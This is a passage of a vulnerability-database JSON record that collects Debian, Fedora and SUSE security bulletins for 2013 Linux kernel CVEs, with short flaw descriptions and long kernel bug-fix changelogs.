"2013-08-29T05:16:38", "id": "DEBIAN:DSA-2745-1:9CD12", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2013/msg00155.html", "title": "[SECURITY] [DSA 2745-1] linux security update", "type": "debian", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1059", "CVE-2013-2232", "CVE-2013-2234"], "description": "The kernel package contains the Linux kernel (vmlinuz), the core of any Linux operating system. The kernel handles the basic functions of the operating system: memory allocation, process allocation, device input and output, etc. ", "modified": "2013-07-14T03:30:56", "published": "2013-07-14T03:30:56", "id": "FEDORA:E71A221415", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: kernel-3.9.9-302.fc19", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1059", "CVE-2013-2232", "CVE-2013-2234", "CVE-2013-4125"], "description": "The kernel package contains the Linux kernel (vmlinuz), the core of any Linux operating system. The kernel handles the basic functions of the operating system: memory allocation, process allocation, device input and output, etc. ", "modified": "2013-07-26T22:59:37", "published": "2013-07-26T22:59:37", "id": "FEDORA:2774121FD9", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: kernel-3.10.3-300.fc19", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0343", "CVE-2013-1059", "CVE-2013-2232", "CVE-2013-2234", "CVE-2013-4125", "CVE-2013-4254"], "description": "The kernel package contains the Linux kernel (vmlinuz), the core of any Linux operating system. The kernel handles the basic functions of the operating system: memory allocation, process allocation, device input and output, etc. ", "modified": "2013-08-23T00:44:38", "published": "2013-08-23T00:44:38", "id": "FEDORA:C1609208D0", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: kernel-3.10.9-200.fc19", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "suse": [{"lastseen": "2016-09-04T11:57:00", "bulletinFamily": "unix", "cvelist": ["CVE-2013-2234", "CVE-2013-1819", "CVE-2013-4162", "CVE-2013-1059", "CVE-2013-2148", "CVE-2013-1774", "CVE-2013-1929", "CVE-2013-2232", "CVE-2013-2851", "CVE-2013-4163", "CVE-2013-2237", "CVE-2013-2164"], "description": "The SUSE Linux Enterprise 11 Service Pack 2 kernel has been\n updated to version 3.0.93 and includes various bug and\n security fixes.\n\n The following security bugs have been fixed:\n\n *\n\n CVE-2013-2148: The fill_event_metadata function in\n fs/notify/fanotify/fanotify_user.c in the Linux kernel did\n not initialize a certain structure member, which allowed\n local users to obtain sensitive information from kernel\n memory via a read operation on the fanotify descriptor.\n\n *\n\n CVE-2013-2237: The key_notify_policy_flush function\n in net/key/af_key.c in the Linux kernel did not initialize\n a certain structure member, which allowed local users to\n obtain sensitive information from kernel heap memory by\n reading a broadcast message from the notify_policy\n interface of an IPSec key_socket.\n\n *\n\n CVE-2013-2232: The ip6_sk_dst_check function in\n net/ipv6/ip6_output.c in the Linux kernel allowed local\n users to cause a denial of service (system crash) by using\n an AF_INET6 socket for a connection to an IPv4 interface.\n\n *\n\n CVE-2013-2234: The (1) key_notify_sa_flush and (2)\n key_notify_policy_flush functions in net/key/af_key.c in\n the Linux kernel did not initialize certain structure\n members, which allowed local users to obtain sensitive\n information from kernel heap memory by reading a broadcast\n message from the notify interface of an IPSec key_socket.\n\n *\n\n CVE-2013-4162: The udp_v6_push_pending_frames\n function in net/ipv6/udp.c in the IPv6 implementation in\n the Linux kernel made an incorrect function call for\n pending data, which allowed local users to cause a denial\n of service (BUG and system crash) via a crafted application\n that uses the UDP_CORK option in a setsockopt system call.\n\n *\n\n CVE-2013-1059: net/ceph/auth_none.c in the Linux\n kernel allowed remote attackers to cause a denial of\n service (NULL pointer dereference and system crash) or\n possibly have unspecified other impact via an auth_reply\n message that triggers an attempted build_request operation.\n\n *\n\n CVE-2013-2164: The mmc_ioctl_cdrom_read_data function\n in drivers/cdrom/cdrom.c in the Linux kernel allowed local\n users to obtain sensitive information from kernel memory\n via a read operation on a malfunctioning CD-ROM drive.\n\n *\n\n CVE-2013-2851: Format string vulnerability in the\n register_disk function in block/genhd.c in the Linux kernel\n allowed local users to gain privileges by leveraging root\n access and writing format string specifiers to\n /sys/module/md_mod/parameters/new_array in order to create\n a crafted /dev/md device name.\n\n *\n\n CVE-2013-4163: The ip6_append_data_mtu function in\n net/ipv6/ip6_output.c in the IPv6 implementation in the\n Linux kernel did not properly maintain information about\n whether the IPV6_MTU setsockopt option had been specified,\n which allowed local users to cause a denial of service (BUG\n and system crash) via a crafted application that uses the\n UDP_CORK option in a setsockopt system call.\n\n *\n\n CVE-2013-1929: Heap-based buffer overflow in the\n tg3_read_vpd function in\n drivers/net/ethernet/broadcom/tg3.c in the Linux kernel\n allowed physically proximate attackers to cause a denial of\n service (system crash) or possibly execute arbitrary code\n via crafted firmware that specifies a long string in the\n Vital Product Data (VPD) data structure.\n\n *\n\n CVE-2013-1819: The _xfs_buf_find function in\n fs/xfs/xfs_buf.c in the Linux kernel did not validate block\n numbers, which allowed local users to cause a denial of\n service (NULL pointer dereference and system crash) or\n possibly have unspecified other impact by leveraging the\n ability to mount an XFS filesystem containing a metadata\n inode with an invalid extent map.\n\n *\n\n CVE-2013-1774: The chase_port function in\n drivers/usb/serial/io_ti.c in the Linux kernel allowed\n local users to cause a denial of service (NULL pointer\n dereference and system crash) via an attempted /dev/ttyUSB\n read or write operation on a disconnected Edgeport USB\n serial converter.\n\n Also the following bugs have been fixed:\n\n BTRFS:\n\n * btrfs: merge contigous regions when loading free\n space cache\n * btrfs: fix how we deal with the orphan block rsv\n * btrfs: fix wrong check during log recovery\n * btrfs: change how we indicate we are adding csums\n * btrfs: flush delayed inodes if we are short on space\n (bnc#801427).\n * btrfs: rework shrink_delalloc (bnc#801427).\n * btrfs: fix our overcommit math (bnc#801427).\n * btrfs: delay block group item insertion (bnc#801427).\n * btrfs: remove bytes argument from do_chunk_alloc\n (bnc#801427).\n * btrfs: run delayed refs first when out of space\n (bnc#801427).\n * btrfs: do not commit instead of overcommitting\n (bnc#801427).\n * btrfs: do not take inode delalloc mutex if we are a\n free space inode (bnc#801427).\n * btrfs: fix chunk allocation error handling\n (bnc#801427).\n * btrfs: remove extent mapping if we fail to add chunk\n (bnc#801427).\n * btrfs: do not overcommit if we do not have enough\n space for global rsv (bnc#801427).\n * btrfs: rework the overcommit logic to be based on the\n total size (bnc#801427).\n * btrfs: steal from global reserve if we are cleaning\n up orphans (bnc#801427).\n * btrfs: clear chunk_alloc flag on retryable failure\n (bnc#801427).\n * btrfs: use reserved space for creating a snapshot\n (bnc#801427).\n * btrfs: cleanup to make the function\n btrfs_delalloc_reserve_metadata more logic (bnc#801427).\n * btrfs: fix space leak when we fail to reserve\n metadata space (bnc#801427).\n * btrfs: fix space accounting for unlink and rename\n (bnc#801427).\n * btrfs: allocate new chunks if the space is not enough\n for global rsv (bnc#801427).\n * btrfs: various abort cleanups (bnc#812526 bnc#801427).\n * btrfs: simplify unlink reservations (bnc#801427).\n\n OTHER:\n\n * x86: Add workaround to NMI iret woes (bnc#831949).\n *\n\n x86: Do not schedule while still in NMI context\n (bnc#831949).\n\n *\n\n bnx2x: Avoid sending multiple statistics queries\n (bnc#814336).\n\n *\n\n bnx2x: protect different statistics flows\n (bnc#814336).\n\n *\n\n futex: Take hugepages into account when generating\n futex_key.\n\n *\n\n drivers/hv: util: Fix a bug in version negotiation\n code for util services (bnc#828714).\n\n *\n\n printk: Add NMI ringbuffer (bnc#831949).\n\n * printk: extract ringbuffer handling from vprintk\n (bnc#831949).\n * printk: NMI safe printk (bnc#831949).\n * printk: Make NMI ringbuffer size independent on\n log_buf_len (bnc#831949).\n * printk: Do not call console_unlock from nmi context\n (bnc#831949).\n *\n\n printk: Do not use printk_cpu from finish_printk\n (bnc#831949).\n\n *\n\n mlx4_en: Adding 40gb speed report for ethtool\n (bnc#831410).\n\n *\n\n reiserfs: Fixed double unlock in reiserfs_setattr\n failure path.\n\n * reiserfs: delay reiserfs lock until journal\n initialization (bnc#815320).\n * reiserfs: do not lock journal_init() (bnc#815320).\n * reiserfs: locking, handle nested locks properly\n (bnc#815320).\n * reiserfs: locking, push write lock out of xattr code\n (bnc#815320).\n *\n\n reiserfs: locking, release lock around quota\n operations (bnc#815320).\n\n *\n\n NFS: support &quot;nosharetransport&quot; option (bnc#807502,\n bnc#828192, FATE#315593).\n\n *\n\n dm mpath: add retain_attached_hw_handler feature\n (bnc#760407).\n\n *\n\n scsi_dh: add scsi_dh_attached_handler_name\n (bnc#760407).\n\n *\n\n bonding: disallow change of MAC if fail_over_mac\n enabled (bnc#827376).\n\n * bonding: propagate unicast lists down to slaves\n (bnc#773255 bnc#827372).\n * bonding: emit address change event also in\n bond_release (bnc#773255 bnc#827372).\n *\n\n bonding: emit event when bonding changes MAC\n (bnc#773255 bnc#827372).\n\n *\n\n SUNRPC: Ensure we release the socket write lock if\n the rpc_task exits early (bnc#830901).\n\n *\n\n ext4: force read-only unless rw=1 module option is\n used (fate#314864).\n\n *\n\n HID: fix unused rsize usage (bnc#783475).\n\n *\n\n HID: fix data access in implement() (bnc#783475).\n\n *\n\n xfs: fix deadlock in xfs_rtfree_extent with kernel\n v3.x (bnc#829622).\n\n *\n\n r8169: allow multicast packets on sub-8168f chipset\n (bnc#805371).\n\n * r8169: support new chips of RTL8111F (bnc#805371).\n * r8169: define the early size for 8111evl (bnc#805371).\n * r8169: fix the reset setting for 8111evl (bnc#805371).\n * r8169: add MODULE_FIRMWARE for the firmware of\n 8111evl (bnc#805371).\n * r8169: fix sticky accepts packet bits in RxConfig\n (bnc#805371).\n * r8169: adjust the RxConfig settings (bnc#805371).\n * r8169: support RTL8111E-VL (bnc#805371).\n * r8169: add ERI functions (bnc#805371).\n * r8169: modify the flow of the hw reset (bnc#805371).\n * r8169: adjust some registers (bnc#805371).\n * r8169: check firmware content sooner (bnc#805371).\n * r8169: support new firmware format (bnc#805371).\n * r8169: explicit firmware format check (bnc#805371).\n *\n\n r8169: move the firmware down into the device private\n data (bnc#805371).\n\n *\n\n mm: link_mem_sections make sure nmi watchdog does not\n trigger while linking memory sections (bnc#820434).\n\n *\n\n kernel: lost IPIs on CPU hotplug (bnc#825048,\n LTC#94784).\n\n *\n\n iwlwifi: use correct supported firmware for 6035 and\n 6000g2 (bnc#825887).\n\n *\n\n watchdog: Update watchdog_thresh atomically\n (bnc#829357).\n\n * watchdog: update watchdog_tresh properly (bnc#829357).\n * watchdog:\n watchdog-make-disable-enable-hotplug-and-preempt-save.patch\n (bnc#829357).\n *\n\n include/1/smp.h: define __smp_call_function_single\n for !CONFIG_SMP (bnc#829357).\n\n *\n\n lpfc: Return correct error code on bsg_timeout\n (bnc#816043).\n\n *\n\n dm-multipath: Drop table when retrying ioctl\n (bnc#808940).\n\n *\n\n scsi: Do not retry invalid function error\n (bnc#809122).\n\n *\n\n scsi: Always retry internal target error (bnc#745640,\n bnc#825227).\n\n *\n\n ibmvfc: Driver version 1.0.1 (bnc#825142).\n\n * ibmvfc: Fix for offlining devices during error\n recovery (bnc#825142).\n * ibmvfc: Properly set cancel flags when cancelling\n abort (bnc#825142).\n * ibmvfc: Send cancel when link is down (bnc#825142).\n * ibmvfc: Support FAST_IO_FAIL in EH handlers\n (bnc#825142).\n *\n\n ibmvfc: Suppress ABTS if target gone (bnc#825142).\n\n *\n\n fs/dcache.c: add cond_resched() to\n shrink_dcache_parent() (bnc#829082).\n\n *\n\n kmsg_dump: do not run on non-error paths by default\n (bnc#820172).\n\n *\n\n mm: honor min_free_kbytes set by user (bnc#826960).\n\n *\n\n hyperv: Fix a kernel warning from\n netvsc_linkstatus_callback() (bnc#828574).\n\n *\n\n RT: Fix up hardening patch to not gripe when avg &gt;\n available, which lockless access makes possible and happens\n in -rt kernels running a cpubound ltp realtime testcase.\n Just keep the output sane in that case.\n\n *\n\n md/raid10: Fix two bug affecting RAID10 reshape (-).\n\n *\n\n Allow NFSv4 to run execute-only files (bnc#765523).\n\n *\n\n fs/ocfs2/namei.c: remove unecessary ERROR when\n removing non-empty directory (bnc#819363).\n\n *\n\n block: Reserve only one queue tag for sync IO if only\n 3 tags are available (bnc#806396).\n\n *\n\n drm/i915: Add wait_for in init_ring_common\n (bnc#813604).\n\n *\n\n drm/i915: Mark the ringbuffers as being in the GTT\n domain (bnc#813604).\n\n *\n\n ext4: avoid hang when mounting non-journal\n filesystems with orphan list (bnc#817377).\n\n *\n\n autofs4 - fix get_next_positive_subdir() (bnc#819523).\n\n *\n\n ocfs2: Add bits_wanted while calculating credits in\n ocfs2_calc_extend_credits (bnc#822077).\n\n *\n\n re-enable io tracing (bnc#785901).\n\n *\n\n SUNRPC: Prevent an rpc_task wakeup race (bnc#825591).\n\n *\n\n tg3: Prevent system hang during repeated EEH errors\n (bnc#822066).\n\n *\n\n backends: Check for insane amounts of requests on the\n ring.\n\n *\n\n Update Xen patches to 3.0.82.\n\n *\n\n netiucv: Hold rtnl between name allocation and device\n registration (bnc#824159).\n\n *\n\n drm/edid: Do not print messages regarding stereo or\n csync by default (bnc #821235).\n\n *\n\n net/sunrpc: xpt_auth_cache should be ignored when\n expired (bnc#803320).\n\n * sunrpc/cache: ensure items removed from cache do not\n have pending upcalls (bnc#803320).\n * sunrpc/cache: remove races with queuing an upcall\n (bnc#803320).\n *\n\n sunrpc/cache: use cache_fresh_unlocked consistently\n and correctly (bnc#803320).\n\n *\n\n md/raid10 &quot;enough&quot; fixes (bnc#773837).\n\n *\n\n Update config files: disable IP_PNP (bnc#822825)\n\n *\n\n Disable efi pstore by default (bnc#804482 bnc#820172).\n\n *\n\n md: Fix problem with GET_BITMAP_FILE returning wrong\n status (bnc#812974 bnc#823497).\n\n *\n\n USB: xHCI: override bogus bulk wMaxPacketSize values\n (bnc#823082).\n\n *\n\n ALSA: hda - Fix system panic when DMA &gt; 40 bits for\n Nvidia audio controllers (bnc#818465).\n\n *\n\n USB: UHCI: fix for suspend of virtual HP controller\n (bnc#817035).\n\n *\n\n mm: mmu_notifier: re-fix freed page still mapped in\n secondary MMU (bnc#821052).\n", "edition": 1, "modified": "2013-09-21T01:04:16", "published": "2013-09-21T01:04:16", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-09/msg00004.html", "id": "SUSE-SU-2013:1474-1", "title": "Security update for Linux kernel (important)", "type": "suse", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:57:20", "bulletinFamily": "unix", "cvelist": ["CVE-2013-2234", "CVE-2013-1819", "CVE-2013-2852", "CVE-2013-3301", "CVE-2013-4162", "CVE-2013-1059", "CVE-2013-2148", "CVE-2013-1929", "CVE-2013-2232", "CVE-2013-2851", "CVE-2013-4163", "CVE-2013-2237", "CVE-2013-2164"], "description": "The SUSE Linux Enterprise 11 Service Pack 3 kernel has been\n updated to version 3.0.93 and to fix various bugs and\n security issues.\n\n The following features have been added:\n\n * NFS: Now supports a &quot;nosharetransport&quot; option\n (bnc#807502, bnc#828192, FATE#315593).\n * ALSA: virtuoso: Xonar DSX support was added\n (FATE#316016).\n\n The following security issues have been fixed:\n\n *\n\n CVE-2013-2148: The fill_event_metadata function in\n fs/notify/fanotify/fanotify_user.c in the Linux kernel did\n not initialize a certain structure member, which allowed\n local users to obtain sensitive information from kernel\n memory via a read operation on the fanotify descriptor.\n\n *\n\n CVE-2013-2237: The key_notify_policy_flush function\n in net/key/af_key.c in the Linux kernel did not initialize\n a certain structure member, which allowed local users to\n obtain sensitive information from kernel heap memory by\n reading a broadcast message from the notify_policy\n interface of an IPSec key_socket.\n\n *\n\n CVE-2013-2232: The ip6_sk_dst_check function in\n net/ipv6/ip6_output.c in the Linux kernel allowed local\n users to cause a denial of service (system crash) by using\n an AF_INET6 socket for a connection to an IPv4 interface.\n\n *\n\n CVE-2013-2234: The (1) key_notify_sa_flush and (2)\n key_notify_policy_flush functions in net/key/af_key.c in\n the Linux kernel did not initialize certain structure\n members, which allowed local users to obtain sensitive\n information from kernel heap memory by reading a broadcast\n message from the notify interface of an IPSec key_socket.\n CVE-2013-4162: The udp_v6_push_pending_frames function in\n net/ipv6/udp.c in the IPv6 implementation in the Linux\n kernel made an incorrect function call for pending data,\n which allowed local users to cause a denial of service (BUG\n and system crash) via a crafted application that uses the\n UDP_CORK option in a setsockopt system call.\n\n *\n\n CVE-2013-1059: net/ceph/auth_none.c in the Linux\n kernel allowed remote attackers to cause a denial of\n service (NULL pointer dereference and system crash) or\n possibly have unspecified other impact via an auth_reply\n message that triggers an attempted build_request operation.\n\n *\n\n CVE-2013-2164: The mmc_ioctl_cdrom_read_data function\n in drivers/cdrom/cdrom.c in the Linux kernel allowed local\n users to obtain sensitive information from kernel memory\n via a read operation on a malfunctioning CD-ROM drive.\n\n *\n\n CVE-2013-2851: Format string vulnerability in the\n register_disk function in block/genhd.c in the Linux kernel\n allowed local users to gain privileges by leveraging root\n access and writing format string specifiers to\n /sys/module/md_mod/parameters/new_array in order to create\n a crafted /dev/md device name.\n\n *\n\n CVE-2013-4163: The ip6_append_data_mtu function in\n net/ipv6/ip6_output.c in the IPv6 implementation in the\n Linux kernel did not properly maintain information about\n whether the IPV6_MTU setsockopt option had been specified,\n which allowed local users to cause a denial of service (BUG\n and system crash) via a crafted application that uses the\n UDP_CORK option in a setsockopt system call.\n\n *\n\n CVE-2013-1929: Heap-based buffer overflow in the\n tg3_read_vpd function in\n drivers/net/ethernet/broadcom/tg3.c in the Linux kernel\n allowed physically proximate attackers to cause a denial of\n service (system crash) or possibly execute arbitrary code\n via crafted firmware that specifies a long string in the\n Vital Product Data (VPD) data structure.\n\n *\n\n CVE-2013-1819: The _xfs_buf_find function in\n fs/xfs/xfs_buf.c in the Linux kernel did not validate block\n numbers, which allowed local users to cause a denial of\n service (NULL pointer dereference and system crash) or\n possibly have unspecified other impact by leveraging the\n ability to mount an XFS filesystem containing a metadata\n inode with an invalid extent map.\n\n Also the following non-security bugs have been fixed:\n\n * ACPI / APEI: Force fatal AER severity when component\n has been reset (bnc#828886 bnc#824568).\n * PCI/AER: Move AER severity defines to aer.h\n (bnc#828886 bnc#824568).\n * PCI/AER: Set dev-&gt;__aer_firmware_first only for\n matching devices (bnc#828886 bnc#824568).\n * PCI/AER: Factor out HEST device type matching\n (bnc#828886 bnc#824568).\n * PCI/AER: Do not parse HEST table for non-PCIe devices\n (bnc#828886 bnc#824568).\n *\n\n PCI/AER: Reset link for devices below Root Port or\n Downstream Port (bnc#828886 bnc#824568).\n\n *\n\n zfcp: fix lock imbalance by reworking request queue\n locking (bnc#835175, LTC#96825).\n\n *\n\n qeth: Fix crash on initial MTU size change\n (bnc#835175, LTC#96809).\n\n *\n\n qeth: change default standard blkt settings for OSA\n Express (bnc#835175, LTC#96808).\n\n *\n\n x86: Add workaround to NMI iret woes (bnc#831949).\n\n *\n\n x86: Do not schedule while still in NMI context\n (bnc#831949).\n\n *\n\n drm/i915: no longer call drm_helper_resume_force_mode\n (bnc#831424,bnc#800875).\n\n *\n\n bnx2x: protect different statistics flows\n (bnc#814336).\n\n * bnx2x: Avoid sending multiple statistics queries\n (bnc#814336).\n *\n\n bnx2x: protect different statistics flows\n (bnc#814336).\n\n *\n\n ALSA: hda - Fix unbalanced runtime pm refount\n (bnc#834742).\n\n *\n\n xhci: directly calling _PS3 on suspend (bnc#833148).\n\n *\n\n futex: Take hugepages into account when generating\n futex_key.\n\n *\n\n e1000e: workaround DMA unit hang on I218 (bnc#834647).\n\n * e1000e: unexpected &quot;Reset adapter&quot; message when cable\n pulled (bnc#834647).\n * e1000e: 82577: workaround for link drop issue\n (bnc#834647).\n * e1000e: helper functions for accessing EMI registers\n (bnc#834647).\n * e1000e: workaround DMA unit hang on I218 (bnc#834647).\n * e1000e: unexpected &quot;Reset adapter&quot; message when cable\n pulled (bnc#834647).\n * e1000e: 82577: workaround for link drop issue\n (bnc#834647).\n *\n\n e1000e: helper functions for accessing EMI registers\n (bnc#834647).\n\n *\n\n Drivers: hv: util: Fix a bug in version negotiation\n code for util services (bnc#828714).\n\n *\n\n printk: Add NMI ringbuffer (bnc#831949).\n\n * printk: extract ringbuffer handling from vprintk\n (bnc#831949).\n * printk: NMI safe printk (bnc#831949).\n * printk: Make NMI ringbuffer size independent on\n log_buf_len (bnc#831949).\n * printk: Do not call console_unlock from nmi context\n (bnc#831949).\n *\n\n printk: Do not use printk_cpu from finish_printk\n (bnc#831949).\n\n *\n\n zfcp: fix schedule-inside-lock in scsi_device list\n loops (bnc#833073, LTC#94937).\n\n *\n\n uvc: increase number of buffers (bnc#822164,\n bnc#805804).\n\n *\n\n drm/i915: Adding more reserved PCI IDs for Haswell\n (bnc#834116).\n\n *\n\n Refresh patches.xen/xen-netback-generalize\n (bnc#827378).\n\n *\n\n Update Xen patches to 3.0.87.\n\n *\n\n mlx4_en: Adding 40gb speed report for ethtool\n (bnc#831410).\n\n *\n\n drm/i915: Retry DP aux_ch communications with a\n different clock after failure (bnc#831422).\n\n * drm/i915: split aux_clock_divider logic in a\n separated function for reuse (bnc#831422).\n * drm/i915: dp: increase probe retries (bnc#831422).\n * drm/i915: Only clear write-domains after a successful\n wait-seqno (bnc#831422).\n * drm/i915: Fix write-read race with multiple rings\n (bnc#831422).\n * drm/i915: Retry DP aux_ch communications with a\n different clock after failure (bnc#831422).\n * drm/i915: split aux_clock_divider logic in a\n separated function for reuse (bnc#831422).\n * drm/i915: dp: increase probe retries (bnc#831422).\n * drm/i915: Only clear write-domains after a successful\n wait-seqno (bnc#831422).\n *\n\n drm/i915: Fix write-read race with multiple rings\n (bnc#831422).\n\n *\n\n xhci: Add xhci_disable_ports boot option (bnc#822164).\n\n *\n\n xhci: set device to D3Cold on shutdown (bnc#833097).\n\n *\n\n reiserfs: Fixed double unlock in reiserfs_setattr\n failure path.\n\n * reiserfs: locking, release lock around quota\n operations (bnc#815320).\n * reiserfs: locking, push write lock out of xattr code\n (bnc#815320).\n * reiserfs: locking, handle nested locks properly\n (bnc#815320).\n * reiserfs: do not lock journal_init() (bnc#815320).\n *\n\n reiserfs: delay reiserfs lock until journal\n initialization (bnc#815320).\n\n *\n\n NFS: support &quot;nosharetransport&quot; option (bnc#807502,\n bnc#828192, FATE#315593).\n\n *\n\n HID: hyperv: convert alloc+memcpy to memdup.\n\n * Drivers: hv: vmbus: Implement multi-channel support\n (fate#316098).\n * Drivers: hv: Add the GUID fot synthetic fibre channel\n device (fate#316098).\n * tools: hv: Check return value of setsockopt call.\n * tools: hv: Check return value of poll call.\n * tools: hv: Check retrun value of strchr call.\n * tools: hv: Fix file descriptor leaks.\n * tools: hv: Improve error logging in KVP daemon.\n * drivers: hv: switch to use mb() instead of smp_mb().\n * drivers: hv: check interrupt mask before read_index.\n * drivers: hv: allocate synic structures before\n hv_synic_init().\n * storvsc: Increase the value of scsi timeout for\n storvsc devices (fate#316098).\n * storvsc: Update the storage protocol to win8 level\n (fate#316098).\n * storvsc: Implement multi-channel support\n (fate#316098).\n * storvsc: Support FC devices (fate#316098).\n * storvsc: Increase the value of\n STORVSC_MAX_IO_REQUESTS (fate#316098).\n * hyperv: Fix the NETIF_F_SG flag setting in netvsc.\n * Drivers: hv: vmbus: incorrect device name is printed\n when child device is unregistered.\n *\n\n Tools: hv: KVP: Fix a bug in IPV6 subnet enumeration\n (bnc#828714).\n\n *\n\n ipv6: ip6_append_data_mtu did not care about pmtudisc\n and frag_size (bnc#831055, CVE-2013-4163).\n\n *\n\n ipv6: ip6_append_data_mtu did not care about pmtudisc\n and frag_size (bnc#831055, CVE-2013-4163).\n\n *\n\n dm mpath: add retain_attached_hw_handler feature\n (bnc#760407).\n\n *\n\n scsi_dh: add scsi_dh_attached_handler_name\n (bnc#760407).\n\n *\n\n af_key: fix info leaks in notify messages (bnc#827749\n CVE-2013-2234).\n\n *\n\n af_key: initialize satype in\n key_notify_policy_flush() (bnc#828119 CVE-2013-2237).\n\n *\n\n ipv6: call udp_push_pending_frames when uncorking a\n socket with (bnc#831058, CVE-2013-4162).\n\n *\n\n tg3: fix length overflow in VPD firmware parsing\n (bnc#813733 CVE-2013-1929).\n\n *\n\n xfs: fix _xfs_buf_find oops on blocks beyond the\n filesystem end (CVE-2013-1819 bnc#807471).\n\n *\n\n ipv6: ip6_sk_dst_check() must not assume ipv6 dst\n (bnc#827750, CVE-2013-2232).\n\n *\n\n dasd: fix hanging devices after path events\n (bnc#831623, LTC#96336).\n\n *\n\n kernel: z90crypt module load crash (bnc#831623,\n LTC#96214).\n\n *\n\n ata: Fix DVD not dectected at some platform with\n Wellsburg PCH (bnc#822225).\n\n *\n\n drm/i915: edp: add standard modes (bnc#832318).\n\n *\n\n Do not switch camera on yet more HP machines\n (bnc#822164).\n\n *\n\n Do not switch camera on HP EB 820 G1 (bnc#822164).\n\n *\n\n xhci: Avoid NULL pointer deref when host dies\n (bnc#827271).\n\n *\n\n bonding: disallow change of MAC if fail_over_mac\n enabled (bnc#827376).\n\n * bonding: propagate unicast lists down to slaves\n (bnc#773255 bnc#827372).\n * net/bonding: emit address change event also in\n bond_release (bnc#773255 bnc#827372).\n *\n\n bonding: emit event when bonding changes MAC\n (bnc#773255 bnc#827372).\n\n *\n\n usb: host: xhci: Enable XHCI_SPURIOUS_SUCCESS for all\n controllers with xhci 1.0 (bnc#797909).\n\n *\n\n xhci: fix null pointer dereference on\n ring_doorbell_for_active_rings (bnc#827271).\n\n *\n\n updated reference for security issue fixed inside\n (CVE-2013-3301 bnc#815256)\n\n *\n\n qla2xxx: Clear the MBX_INTR_WAIT flag when the\n mailbox time-out happens (bnc#830478).\n\n *\n\n drm/i915: initialize gt_lock early with other spin\n locks (bnc#801341).\n\n * drm/i915: fix up gt init sequence fallout\n (bnc#801341).\n * drm/i915: initialize gt_lock early with other spin\n locks (bnc#801341).\n *\n\n drm/i915: fix up gt init sequence fallout\n (bnc#801341).\n\n *\n\n timer_list: Correct the iterator for timer_list\n (bnc#818047).\n\n *\n\n firmware: do not spew errors in normal boot\n (bnc#831438, fate#314574).\n\n *\n\n ALSA: virtuoso: Xonar DSX support (FATE#316016).\n\n *\n\n SUNRPC: Ensure we release the socket write lock if\n the rpc_task exits early (bnc#830901).\n\n *\n\n ext4: Re-add config option Building ext4 as the\n ext4-writeable KMP uses CONFIG_EXT4_FS_RW=y to denote that\n read-write module should be enabled. This update just\n defaults allow_rw to true if it is set.\n\n *\n\n e1000: fix vlan processing regression (bnc#830766).\n\n *\n\n ext4: force read-only unless rw=1 module option is\n used (fate#314864).\n\n *\n\n dm mpath: fix ioctl deadlock when no paths\n (bnc#808940).\n\n *\n\n HID: fix unused rsize usage (bnc#783475).\n\n *\n\n add reference for b43 format string flaw (bnc#822579\n CVE-2013-2852)\n\n *\n\n HID: fix data access in implement() (bnc#783475).\n\n *\n\n xfs: fix deadlock in xfs_rtfree_extent with kernel\n v3.x (bnc#829622).\n\n *\n\n kernel: sclp console hangs (bnc#830346, LTC#95711).\n\n *\n\n Refresh\n patches.fixes/rtc-add-an-alarm-disable-quirk.patch.\n\n *\n\n Delete\n patches.drm/1209-nvc0-fb-shut-up-pmfb-interrupt-after-the-fi\n rst-occurrence. It was removed from series.conf in\n 063ed686e5a3cda01a7ddbc49db1499da917fef5 but the file was\n not deleted.\n\n *\n\n Drivers: hv: balloon: Do not post pressure status if\n interrupted (bnc#829539).\n\n *\n\n Drivers: hv: balloon: Fix a bug in the hot-add code\n (bnc#829539).\n\n *\n\n drm/i915: Fix incoherence with fence updates on\n Sandybridge+ (bnc#809463).\n\n * drm/i915: merge {i965, sandybridge}_write_fence_reg()\n (bnc#809463).\n * drm/i915: Fix incoherence with fence updates on\n Sandybridge+ (bnc#809463).\n *\n\n drm/i915: merge {i965, sandybridge}_write_fence_reg()\n (bnc#809463).\n\n *\n\n Refresh\n patches.fixes/rtc-add-an-alarm-disable-quirk.patch.\n\n *\n\n r8169: allow multicast packets on sub-8168f chipset\n (bnc#805371).\n\n * r8169: support new chips of RTL8111F (bnc#805371).\n * r8169: define the early size for 8111evl (bnc#805371).\n * r8169: fix the reset setting for 8111evl (bnc#805371).\n * r8169: add MODULE_FIRMWARE for the firmware of\n 8111evl (bnc#805371).\n * r8169: fix sticky accepts packet bits in RxConfig\n (bnc#805371).\n * r8169: adjust the RxConfig settings (bnc#805371).\n * r8169: support RTL8111E-VL (bnc#805371).\n * r8169: add ERI functions (bnc#805371).\n * r8169: modify the flow of the hw reset (bnc#805371).\n * r8169: adjust some registers (bnc#805371).\n * r8169: check firmware content sooner (bnc#805371).\n * r8169: support new firmware format (bnc#805371).\n * r8169: explicit firmware format check (bnc#805371).\n * r8169: move the firmware down into the device private\n data (bnc#805371).\n * r8169: allow multicast packets on sub-8168f chipset\n (bnc#805371).\n * r8169: support new chips of RTL8111F (bnc#805371).\n * r8169: define the early size for 8111evl (bnc#805371).\n * r8169: fix the reset setting for 8111evl (bnc#805371).\n * r8169: add MODULE_FIRMWARE for the firmware of\n 8111evl (bnc#805371).\n * r8169: fix sticky accepts packet bits in RxConfig\n (bnc#805371).\n * r8169: adjust the RxConfig settings (bnc#805371).\n * r8169: support RTL8111E-VL (bnc#805371).\n * r8169: add ERI functions (bnc#805371).\n * r8169: modify the flow of the hw reset (bnc#805371).\n * r8169: adjust some registers (bnc#805371).\n * r8169: 